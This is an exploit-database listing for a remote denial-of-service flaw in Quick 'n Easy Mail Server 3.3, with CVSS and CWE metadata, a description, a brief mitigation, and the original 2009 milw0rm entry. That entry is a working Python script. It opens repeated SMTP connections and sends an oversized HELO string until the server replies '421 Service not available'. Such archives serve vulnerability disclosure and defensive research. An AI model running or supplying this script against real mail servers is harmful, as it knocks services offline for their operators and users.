header-logo
Suggest Exploit
vendor:
Quick 'n Easy Mail Server
by:
shinnai
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Quick 'n Easy Mail Server
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:pablosoftwaresolutions:quick_'n_easy_mail_server:3.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Quick ‘n Easy Mail Server 3.3 (Demo) Remote Denial of Service

When a long string is passed to the server, it checks for buffer overflow type attacks and answers with a '<SMTP> Buffer overflow: DOS attack?' after 25 requests (more or less). An attacker can exploit this issue to trigger denial of service conditions. In case of successful exploitation of this vulnerability, the server will answer to requests with '<SMTP> 421 Service not available'

Mitigation:

Ensure that the server is configured to handle long strings properly and limit the number of requests it can receive.
Source

Exploit-DB raw data:

# ---------------------------------------------------------------
# Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service
# http://www.pablosoftwaresolutions.com/

# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net/

# When you pass a long string to the server, it checks for bof
# type attacks and answers with a:
# "<SMTP> Buffer overflow: DOS attack?"
# after 25 requests (more or less), server is unable to handle
# errors.
# An attacker can exploit this issue to trigger dos conditions.
# In case of succesful exploitation of this vulnerability,
# the server will answer to requests as below:
# "<SMTP> 421 Service not available"
#---------------------------------------------------------------"

import socket

try:
   for i in range(1,30):
      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      conn = s.connect(("127.0.0.1",25))
      s.send('HELO ' + "AAA@AAAAAA.COM" * 4000 + '\r\n')
      d = s.recv(1024)
      print d
      s.close
   raw_input("Done. If server is still available, try to increase the number of requests.\n\nPress enter to quit...")
except:
   raw_input("Unable to connect!\n\nPress enter to quit...")

# milw0rm.com [2009-05-04]

Navigation

Suggest Exploit

Services By CQR